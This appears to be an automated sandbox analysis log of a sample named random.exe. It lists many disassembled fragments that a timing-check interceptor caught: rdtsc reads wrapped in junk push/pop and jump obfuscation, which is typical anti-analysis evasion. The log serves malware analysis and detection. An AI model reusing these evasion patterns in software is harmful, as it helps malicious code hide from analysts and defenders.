Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF05A2 second address: 4CF0604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3C150B7577h 0x00000009 sbb esi, 3BCDDAAEh 0x0000000f jmp 00007F3C150B7579h 0x00000014 popfd 0x00000015 mov bx, si 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007F3C150B756Dh 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 mov eax, 65F01FC3h 0x00000028 mov dl, al 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e mov ecx, edx 0x00000030 push eax 0x00000031 push edx 0x00000032 mov dh, E5h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20E85 second address: 4D20EBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3C153246E0h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov di, FB04h 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20EBE second address: 4D20ECC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B756Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20ECC second address: 4D20F08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F3C153246E4h 0x00000012 sbb si, E618h 0x00000017 jmp 00007F3C153246DBh 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20F08 second address: 4D20F4C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3C150B7574h 0x00000008 adc eax, 460A5078h 0x0000000e jmp 00007F3C150B756Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F3C150B7575h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D007E8 second address: 4D00897 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 jmp 00007F3C153246DAh 0x0000000e pushfd 0x0000000f jmp 00007F3C153246E2h 0x00000014 add esi, 3C8DFC68h 0x0000001a jmp 00007F3C153246DBh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007F3C153246E9h 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 jmp 00007F3C153246DCh 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 jmp 00007F3C153246E7h 0x00000036 mov eax, dword ptr [ebp+08h] 0x00000039 pushad 0x0000003a jmp 00007F3C153246E4h 0x0000003f mov bx, si 0x00000042 popad 0x00000043 and dword ptr [eax], 00000000h 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F3C153246E3h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D00897 second address: 4D008F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3C150B756Fh 0x00000008 pushfd 0x00000009 jmp 00007F3C150B7578h 0x0000000e xor ax, F848h 0x00000013 jmp 00007F3C150B756Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c and dword ptr [eax+04h], 00000000h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F3C150B7575h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D008F1 second address: 4D00924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3C153246DDh 0x00000013 adc ax, 5EC6h 0x00000018 jmp 00007F3C153246E1h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CE09D0 second address: 4CE09E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3C150B7574h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D003C9 second address: 4D003CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D003CF second address: 4D003FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3C150B7576h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D003FC second address: 4D00400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D00400 second address: 4D00404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D00404 second address: 4D0040A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D0040A second address: 4D00410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D00410 second address: 4D00414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D00414 second address: 4D00418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D00418 second address: 4D00430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3C153246DDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D206EF second address: 4D206F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D206F5 second address: 4D206F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20811 second address: 4D20883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 4392598Dh 0x00000008 pushfd 0x00000009 jmp 00007F3C150B756Ah 0x0000000e sub eax, 1BC1D5A8h 0x00000014 jmp 00007F3C150B756Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d ror eax, cl 0x0000001f jmp 00007F3C150B7576h 0x00000024 leave 0x00000025 pushad 0x00000026 mov eax, 581B00DDh 0x0000002b pushad 0x0000002c movzx eax, bx 0x0000002f mov eax, edx 0x00000031 popad 0x00000032 popad 0x00000033 retn 0004h 0x00000036 nop 0x00000037 mov esi, eax 0x00000039 lea eax, dword ptr [ebp-08h] 0x0000003c xor esi, dword ptr [006B2014h] 0x00000042 push eax 0x00000043 push eax 0x00000044 push eax 0x00000045 lea eax, dword ptr [ebp-10h] 0x00000048 push eax 0x00000049 call 00007F3C19767D09h 0x0000004e push FFFFFFFEh 0x00000050 jmp 00007F3C150B7577h 0x00000055 pop eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20883 second address: 4D20887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20887 second address: 4D2088D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D2088D second address: 4D20892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20892 second address: 4D20933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3C150B7576h 0x0000000a sub eax, 029A67F8h 0x00000010 jmp 00007F3C150B756Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 ret 0x0000001a nop 0x0000001b push eax 0x0000001c call 00007F3C19767D62h 0x00000021 mov edi, edi 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F3C150B7574h 0x0000002a sbb cl, 00000058h 0x0000002d jmp 00007F3C150B756Bh 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007F3C150B7578h 0x00000039 jmp 00007F3C150B7575h 0x0000003e popfd 0x0000003f popad 0x00000040 xchg eax, ebp 0x00000041 pushad 0x00000042 jmp 00007F3C150B756Ch 0x00000047 movzx esi, di 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20933 second address: 4D20937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20937 second address: 4D2093D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D2093D second address: 4D20970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 movzx esi, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F3C153246E5h 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F3C153246DDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20970 second address: 4D20976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20976 second address: 4D2097A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D2097A second address: 4D2097E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D2097E second address: 4D2099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3C153246E2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD0095 second address: 4CD00A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B756Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD00A4 second address: 4CD00D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3C153246DDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD00D3 second address: 4CD013B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3C150B7577h 0x00000009 jmp 00007F3C150B7573h 0x0000000e popfd 0x0000000f movzx eax, di 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 jmp 00007F3C150B7570h 0x0000001b mov dword ptr [esp], ecx 0x0000001e jmp 00007F3C150B7570h 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F3C150B756Ah 0x0000002d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD013B second address: 4CD013F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD013F second address: 4CD0145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD0145 second address: 4CD014B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD014B second address: 4CD014F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD014F second address: 4CD016C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3C153246E2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD016C second address: 4CD0185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov bl, F2h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 0EC63B84h 0x00000014 mov dx, 8BF0h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD0185 second address: 4CD019E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3C153246E5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD019E second address: 4CD01A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD01A2 second address: 4CD0242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b jmp 00007F3C153246DDh 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F3C153246DCh 0x00000018 sub si, 9E98h 0x0000001d jmp 00007F3C153246DBh 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F3C153246E8h 0x00000029 sbb ecx, 6A6748F8h 0x0000002f jmp 00007F3C153246DBh 0x00000034 popfd 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 mov esi, edx 0x0000003a movsx edi, cx 0x0000003d popad 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 pushfd 0x00000045 jmp 00007F3C153246E5h 0x0000004a xor si, 0046h 0x0000004f jmp 00007F3C153246E1h 0x00000054 popfd 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD0242 second address: 4CD0268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 call 00007F3C150B7573h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD0268 second address: 4CD026C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD026C second address: 4CD0272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD0272 second address: 4CD02DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3C153246E9h 0x00000009 and al, FFFFFFB6h 0x0000000c jmp 00007F3C153246E1h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F3C153246DFh 0x0000001f adc ax, 86EEh 0x00000024 jmp 00007F3C153246E9h 0x00000029 popfd 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD02DD second address: 4CD037E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3C150B756Dh 0x00000009 and eax, 5A9A5F26h 0x0000000f jmp 00007F3C150B7571h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F3C150B7570h 0x0000001b and cl, FFFFFFC8h 0x0000001e jmp 00007F3C150B756Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov dword ptr [esp], edi 0x0000002a pushad 0x0000002b pushad 0x0000002c call 00007F3C150B7572h 0x00000031 pop eax 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushfd 0x00000038 jmp 00007F3C150B7577h 0x0000003d xor ecx, 65F9DC6Eh 0x00000043 jmp 00007F3C150B7579h 0x00000048 popfd 0x00000049 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD037E second address: 4CD03A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 test esi, esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3C153246E9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD03A0 second address: 4CD03B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3C150B756Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD03B0 second address: 4CD0420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F3C8758292Ah 0x00000011 jmp 00007F3C153246E6h 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007F3C153246DDh 0x00000025 pop eax 0x00000026 pushfd 0x00000027 jmp 00007F3C153246E1h 0x0000002c or ecx, 497890C6h 0x00000032 jmp 00007F3C153246E1h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD0420 second address: 4CD0430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3C150B756Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD0430 second address: 4CD048E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F3C875828C0h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F3C153246E4h 0x00000018 adc cl, FFFFFFC8h 0x0000001b jmp 00007F3C153246DBh 0x00000020 popfd 0x00000021 jmp 00007F3C153246E8h 0x00000026 popad 0x00000027 mov edx, dword ptr [esi+44h] 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD048E second address: 4CD0492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD0492 second address: 4CD0498 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD0498 second address: 4CD0581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 pushfd 0x00000007 jmp 00007F3C150B756Eh 0x0000000c add cx, 3888h 0x00000011 jmp 00007F3C150B756Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a or edx, dword ptr [ebp+0Ch] 0x0000001d jmp 00007F3C150B7576h 0x00000022 test edx, 61000000h 0x00000028 pushad 0x00000029 call 00007F3C150B756Eh 0x0000002e pushad 0x0000002f popad 0x00000030 pop ecx 0x00000031 pushfd 0x00000032 jmp 00007F3C150B7571h 0x00000037 add ax, 7906h 0x0000003c jmp 00007F3C150B7571h 0x00000041 popfd 0x00000042 popad 0x00000043 jne 00007F3C873156D2h 0x00000049 pushad 0x0000004a movzx esi, dx 0x0000004d mov bh, D3h 0x0000004f popad 0x00000050 test byte ptr [esi+48h], 00000001h 0x00000054 pushad 0x00000055 movzx ecx, bx 0x00000058 pushad 0x00000059 mov ebx, 29ECA3ECh 0x0000005e mov esi, ebx 0x00000060 popad 0x00000061 popad 0x00000062 jne 00007F3C873156CCh 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b jmp 00007F3C150B7578h 0x00000070 pushfd 0x00000071 jmp 00007F3C150B7572h 0x00000076 sub si, 0468h 0x0000007b jmp 00007F3C150B756Bh 0x00000080 popfd 0x00000081 popad 0x00000082 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC08C5 second address: 4CC08C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC08C9 second address: 4CC08DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 mov ch, 78h 0x0000000b push eax 0x0000000c push edx 0x0000000d mov bx, 7AD8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC08DA second address: 4CC0954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3C153246E3h 0x00000011 and ax, 059Eh 0x00000016 jmp 00007F3C153246E9h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F3C153246E0h 0x00000022 adc si, BF98h 0x00000027 jmp 00007F3C153246DBh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F3C153246E5h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0954 second address: 4CC0A24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 jmp 00007F3C150B7578h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e and esp, FFFFFFF8h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F3C150B756Eh 0x00000018 add esi, 13D5F388h 0x0000001e jmp 00007F3C150B756Bh 0x00000023 popfd 0x00000024 push eax 0x00000025 push ebx 0x00000026 pop ecx 0x00000027 pop edi 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b mov bh, ch 0x0000002d mov edx, 0E0755FCh 0x00000032 popad 0x00000033 push eax 0x00000034 jmp 00007F3C150B7572h 0x00000039 xchg eax, ebx 0x0000003a jmp 00007F3C150B7570h 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007F3C150B756Eh 0x00000047 sbb si, 7378h 0x0000004c jmp 00007F3C150B756Bh 0x00000051 popfd 0x00000052 pushfd 0x00000053 jmp 00007F3C150B7578h 0x00000058 or ax, 0DD8h 0x0000005d jmp 00007F3C150B756Bh 0x00000062 popfd 0x00000063 popad 0x00000064 push eax 0x00000065 pushad 0x00000066 push edx 0x00000067 mov dx, si 0x0000006a pop esi 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0A24 second address: 4CC0AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 jmp 00007F3C153246E4h 0x0000000c mov esi, dword ptr [ebp+08h] 0x0000000f pushad 0x00000010 pushad 0x00000011 mov edx, esi 0x00000013 popad 0x00000014 push edi 0x00000015 push eax 0x00000016 pop ebx 0x00000017 pop ecx 0x00000018 popad 0x00000019 mov ebx, 00000000h 0x0000001e pushad 0x0000001f call 00007F3C153246E8h 0x00000024 mov dl, cl 0x00000026 pop edi 0x00000027 jmp 00007F3C153246DCh 0x0000002c popad 0x0000002d test esi, esi 0x0000002f jmp 00007F3C153246E0h 0x00000034 je 00007F3C87589FD8h 0x0000003a jmp 00007F3C153246E0h 0x0000003f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000046 jmp 00007F3C153246E0h 0x0000004b mov ecx, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 mov edi, 22FFAFD0h 0x00000055 push ebx 0x00000056 pop esi 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0AC6 second address: 4CC0B0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B7572h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F3C8731CE2Dh 0x0000000f pushad 0x00000010 mov edi, eax 0x00000012 pushfd 0x00000013 jmp 00007F3C150B756Ah 0x00000018 sub si, BB48h 0x0000001d jmp 00007F3C150B756Bh 0x00000022 popfd 0x00000023 popad 0x00000024 test byte ptr [76FB6968h], 00000002h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
